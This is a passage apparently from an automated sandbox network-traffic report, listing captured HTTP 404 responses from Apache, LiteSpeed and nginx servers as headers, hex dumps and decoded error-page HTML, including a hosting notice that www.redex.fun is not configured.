70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:59 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:02 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:04 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:20:07 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 68 67 33 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uhg3/ was not found on this server.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:20:21 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closex-ray: p529:0.000Data Raw: 31 37 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 54 49 54 4c 45 3e d0 a1 d0 b0 d0 b9 d1 82 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 d0 bd d0 b5 20 d0 bd d0 b0 d1 81 d1 82 d1 80 d0 be d0 b5 d0 bd 20 d0 bd d0 b0 20 d1 81 d0 b5 d1 80 d0 b2 d0 b5 d1 80 d0 b5 3c 2f 54 49 54 4c 45 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 64 6d 2e 74 6f 6f 6c 73 2f 70 61 72 6b 69 6e 67 2d 70 61 67 65 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 61 6e 67 75 61 67 65 73 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 65 6e 27 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 74 69 74 6c 65 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 68 31 27 3a 20 27 57 65 62 73 69 74 65 20 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 73 65 72 76 65 72 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 31 27 3a 20 27 57 65 62 73 69 74 65 20 3c 62 3e 77 77 77 2e 72 65 64 65 78 2e 66 75 6e 3c 2f 62 3e 20 69 73 20 6e 6f 74 20 63 6f 6e 66 69 67 75 72 65 64 20 6f 6e 20 74 68 65 20 68 6f 73 74 69 6e 67 20 73 65 72 76 65 72 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 6d 65 73 73 61 67 65 32 27 3a 20 27 44 6f 6d 61 69 6e 20 61 64 64 72 65 73 73 20 72 65 63 6f 72 64 20 70 6f 69 6e 74 73 20 74 6f 20 6f 75 72 20 73 65 72 76 65 72 2c 20 62 75 74 20 74 68 69 73 20 73 69 74 65 20 69 73 20 6e 6f 74 20 73 65 72 76 65 64 2e 3c 62 72 3e 49 66 20 79 6f 75 20 68 61 76 65 20 72 65 63 65 6e 74 6c 79 20 61 64 64 65 64 20 61 20 73 69 74 65 20 74 6f 20 79 6f 75 72 20 63 6f 6e 74 72 6f 6c 20 70 61 6e 65 6c 20 2d 20 77 61 69 74 20 31 35 20 6d 69 6e 75 74 65 73 20 61 6e 64 20 79 6f 75 72 20 73 69 74 65 20 77 69 6c 6c 20 73 74 61 72 74 20 77 6f 72 6b 69 6e 67 2e 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 2e 68 65 6c 70 5f 62 75 74 74 6f 6e 27 3a 20 27 48 6f 77 20 63 61 6e 20 49 20 66 69 78 20 74 68 69 73 3f 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 01 Nov 2024 08:20:27 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 01 Nov 2024 08:20:30 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 01 Nov 2024 08:20:35 GMTserver: LiteSpeedvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f
